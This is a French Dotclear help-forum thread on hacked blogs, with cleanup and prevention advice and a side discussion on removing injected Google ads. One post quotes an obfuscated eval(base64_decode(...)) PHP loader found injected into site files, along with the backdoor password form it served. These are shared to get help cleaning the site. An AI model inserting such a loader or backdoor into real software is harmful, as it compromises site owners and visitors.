Vous n'êtes pas identifié(e).
13 février 2024 Sortie de Dotclear 2.29
Bonjour,
Ce sujet concerne les personnes qui rencontrent des comportements anormaux sur leurs sites web.
Les symptômes
Les symptômes peuvent être de différents types :
* Code non attendu dans les pages du blog, souvent des insertions de code en fin de page, de type iframe
* Site soudainement reconnu comme malveillant par google ou firefox
* Site défacé
* fichiers .php modifiés sur l'espace ftp
Les causes possibles
Toutes les anomalies énumérées ci-dessus peuvent signifier que votre site a été compromis. L'origine de la compromission peut ne pas venir d'une faille de dotclear. Pour rappel, il n'existe à ce jour aucune faille avérée sur la dernière version de dotclear en date (2.1.6).
Depuis quelques temps sévissent des malware qui se installent des espions sur le pc de l'utilisateur. Les activités de ces espions sont :
* Ecoute de communications sur des protocoles particuliers (ftp, par exemple), et capture des informations sensibles (logins, mots de passe)
* Ecoute du clavier (keylogger)
Les malware en question exploitent des failles récentes des plugins des navigateurs web (dont Adobe Flash/PDF) pour s'installer sur le poste de l'utilisateur visé.
Certains de ces malware communiquent le fruit de leur cueillette sur des sites externes, exposant ainsi vos identifiants ftp à d'éventuels pirates. Ces derniers peuvent alors en toute impunité accéder à vos espaces ftp, et modifier leur contenu, par exemple pour y re-progaper le malware. Il a été récemment recensé des vagues d'injection de code dans les index.php des sites, par exemple
Résolution du problème
Avant toute chose, si vous en avez la possibilité, mettez votre site en mode maintenance (désactivation via une console utilisateur, par exemple).
Ensuite, il faut s'assurer que le pc utilisé n'est pas infecté par un malware/trojan :
* Passez votre pc à l'antivirus et à l'antispyware
* Au besoin, faites une passe via hijackthis
Dès que votre pc est "sûr", allez sur l'espace de votre hébergeur, et changez vos mots de passe ftp, et mysql/postgresql.
Effacez les fichiers modifiés sur votre espace ftp, et restaurez-y les fichiers originaux, puis modifiez le inc/config.php de votre blog pour y mentionner les nouveaux mots de passe.
Enfin, prévenez les éventuels autres utilisateurs ayant les identifiants ftp de votre site de scanner leur pc avant de se reconnecter en ftp sur votre site.
La prévention
* Maintenez vos antivirus/antispyware à jour sur votre PC, le plus régulièrement possible
* Limitez le nombre d'utilisateurs ayant vos identifiants ftp
Dyslexics have more fnu!
Hors ligne
* Passez votre pc à l'antivirus et à l'antispyware
Pour cette étape, on peut utiliser un antivirus en ligne : http://housecall.trendmicro.com/fr/
- les règles du forum : http://forum.dotclear.net/viewtopic.php?id=39494
- la galaxie de Dotclear 2 : http://fr.dotclear.org/documentation/2.0/links
Hors ligne
Pour hijackthis, voir ici.
Autre scanner en ligne : http://support.kaspersky.com/fr/viruses/online
Pour une analyse du pc entier, cliquer sur :
"Kaspersky
Online Scanner
Cliquez-ici !"
Hors ligne
Un sujet sur les forums OVH est similaire à celui-là :
http://forum.ovh.com/showthread.php?t=49433
Dyslexics have more fnu!
Hors ligne
Un des sites que je gère s'est fait pirater : du code malveillant était ajouté au début de chaque fichier
eval(base64_decode('aWYoZnVuY3Rpb25fZXhpc3RzKCdvYl9zdGFydCcpJiYhaXNzZXQoJEdMT0JBTFNbJ21mc24nXSkpeyRHTE9CQUxTWydtZnNuJ109Jy9rdW5kZW4vaG9tZXBhZ2VzLzM4L2QyNDY4ODE0OTcvaHRkb2NzL2RvdGNsZWFyL2VjcmlyZS90b29scy9zcGFtcGxlbW91c3NlL3NldHVwL2ZpY2hpZXJzLzEuMi40L3N0eWxlLmNzcy5waHAnO2lmKGZpbGVfZXhpc3RzKCRHTE9CQUxTWydtZnNuJ10pKXtpbmNsdWRlX29uY2UoJEdMT0JBTFNbJ21mc24nXSk7aWYoZnVuY3Rpb25fZXhpc3RzKCdnbWwnKSYmZnVuY3Rpb25fZXhpc3RzKCdkZ29iaCcpKXtvYl9zdGFydCgnZGdvYmgnKTt9fX0='));
J'ai remis une archive toute propre, vérifié plugins et thèmes et pourtant, je continue d'avoir des comportements bizarres :
Chaque fois que je vais sur une page dont l'url comporte udp=1 (donc chaque fois que je change des settings ou le thème par exemple), j'obtiens une page blanche dont le code source est :
<form action='/dotclear2/admin/blog_theme.php?upd=1' method='POST'><center><input name='dgnnpass' type='password'></center></form>
Je ne comprends pas bien comment cela peut être possible alors que les fichiers sont censés être propre.
Une idée ?
Hors ligne
Il y a eu de récentes attaques qui ressemblent à cela sur des sites qui utilisent le module de stats PHPMyVisites, qu'il est conseillé de mettre à jour d'urgence.
Voir http://www.phpmyvisites.net/
Tous les fichiers php du site sont suceptibles d'être modifié par cette attaque. Vérifier les dates des fichiers.
Hors ligne
Publicités sur Free, comment les supprimer ?
Bonjour à tous.Un esprit supérieur saurait-il me guider pour supprimer l'apparition des publicités sur mon blog hébergé chez Free ? Et la chose est-elle faisable ?
Je ne supporte pas cette nouvelle intrusion imposée par Free qui certes est en droit de le faire mais aurait pu au moins nous prévenir.
mon blog : http://domcorrieras.free.fr
Merci d'avance
Dom Corrieras
Hors ligne
Publicités sur Free, comment les supprimer ?
Bonjour à tous.Un esprit supérieur saurait-il me guider pour supprimer l'apparition des publicités sur mon blog hébergé chez Free ? Et la chose est-elle faisable ?
Je ne supporte pas cette nouvelle intrusion imposée par Free qui certes est en droit de le faire mais aurait pu au moins nous prévenir.
mon blog : http://domcorrieras.free.fr
Bonjour,
J'ai pas assez d'exemples pour le confirmer mais cela ne semble pas s'appliquer à tous. C'est vrai que s'ils oublient de vous prévenir, c'est pas très respectueux comme façon de procéder. Mais je suis assez étonné dont la façon dont se place les publicités.
Hors ligne
Les publicités dont tu parles sont les adwords Google que l'on trouve dans l'en-tête, le menu de droite et le pied de page ?
C'est bien la première fois que je vois Free ajouter quoi que ce soit aux pages perso...
Hors ligne
Oui, c'est bien cela. En entête, menu de droite et pied de page. Doit bien y avoir une combine pour s'en débarrasser... nom d'une pipe !
Hors ligne
Ce n'est pas toi qui as ajouté ces publicités ?
- les règles du forum : http://forum.dotclear.net/viewtopic.php?id=39494
- la galaxie de Dotclear 2 : http://fr.dotclear.org/documentation/2.0/links
Hors ligne
Ah non, certainement pas, je m'en passerai bien.
Hors ligne
Consultation du source de ta page depuis mon navigateur (Firefox) : 6 (!) frames avec des liens vers googleads.g.doubleclic... Ca ne te dit rien ? Tu ne te serais pas abonné récemment à un truc chez google ?
Le B.A.BA : https://abc.dotaddict.org
La doc DC2 : https://fr.dotclear.org/documentation/2.0
Mes extensions : https://www.mirovinben.fr/blog/index.ph … pluginsDC2
Mes marqueurs de template : https://www.mirovinben.fr/blog/index.php?post/id3553
Hors ligne
On devrait pouvoir passer par une solution jQuery qui supprime du DOM tous les scripts contenant "google_ad_client = "pub-3839814238443346";" à la fin du chargement de la page, non ?
Hors ligne
Consultation du source de ta page depuis mon navigateur (Firefox) : 6 (!) frames avec des liens vers googleads.g.doubleclic... Ca ne te dit rien ? Tu ne te serais pas abonné récemment à un truc chez google ?
Il semble que notre ami ne les ait pas ajoutés lui-même. D'ailleurs, un abonnement adwords ne crée pas le code inséré sur les pages sans intervention sur les fichiers ;)
Hors ligne
C'est pareil avec le thème par défaut ? J'ai téléchargé un billet directement (sans interprétation de Javascript) et je trouve bien le code de Google dans la source de la page. Ce code a été ajouté dans les fichiers template, il n'est pas ajouté par du code Javascript.
- les règles du forum : http://forum.dotclear.net/viewtopic.php?id=39494
- la galaxie de Dotclear 2 : http://fr.dotclear.org/documentation/2.0/links
Hors ligne
Merci à tous de vous pencher sur mon problème, qui je pense n'est pas unique. Mais je confirme ne rien avoir ajouté moi-même, ni que je sache m'être abonné à quoi que ce soit chez Google ou autre. Je crois savoir que c'est Free qui a malicieusement inséré quelque part du code pour afficher des pubs sur les pages perso, mais où et comment faire pour s'en débarrasser, that is the question.
Hors ligne
Tu as regardé dans tes fichiers de thème ?
- les règles du forum : http://forum.dotclear.net/viewtopic.php?id=39494
- la galaxie de Dotclear 2 : http://fr.dotclear.org/documentation/2.0/links
Hors ligne
Peux-tu essayer d'ajouter ceci dans le fichier _head.html de ton thème :
<script type="text/javascript">
//<![CDATA[
$(document).ready(function() {
$("html").each(function() {
$(this).find("script").remove(":contains('pub-3839814238443346')")
});
});
//]]>
</script>
Testé chez moi, le code de pub est bien retiré et ne semble plus être interprété par la suite.
Hors ligne
Tu veux supprimer les pubs lors de l'affichage mais pourquoi ne pas essayer de les supprimer dans les fichiers template ? J'ai raté un épisode ?
- les règles du forum : http://forum.dotclear.net/viewtopic.php?id=39494
- la galaxie de Dotclear 2 : http://fr.dotclear.org/documentation/2.0/links
Hors ligne
Ben il me semble que ces scripts sont ajoutés par Free dans les template (bien que je ne sache pas trop comment) sans que le propriétaire y puisse mais, alors je les retire...
Hors ligne
Merci Amalgame. Malheureusement d'une part je ne trouve pas ce fichier _head.html dans le répertoire du thème (Noviny). Il y a un fichier user_head.html dans lequel j'ai collé le script, je l'ai également fait dans le fichier home.html... sans que rien ne change. Enfin, en allant dans l'éditeur de thème interne à Dotclear, j'ai effectivement eu accès à _head.html. J'ai ajouté le code, mais rien ne bouge.... Arghhh...
Hors ligne
Yes !!! j'ai trouvé dans _head.htm, _top.htmll et dans _footer.html, effectivement des sripts javascript faisant appel à la pub Google et compagnie. J'ai tout viré et ça marche, la pub a disparu sauf dans le menu de droite (side-bar?), et là je n'arrive pas à trouver le fichier correspondant....
Hors ligne
... suite. Ceci dit, à l'extrême, celle-ci (la pub dans menu de droite) n'est pas totalement dérangeante. Elle s'insère correctement dans la mise en page, sans rien détruire... mais je m'en passerai quand même. Et une autre question me turlupine. Si Free a mis ça dans mon code, qui les empêchera de recommencer ?
Hors ligne
Vous n'êtes pas identifié(e).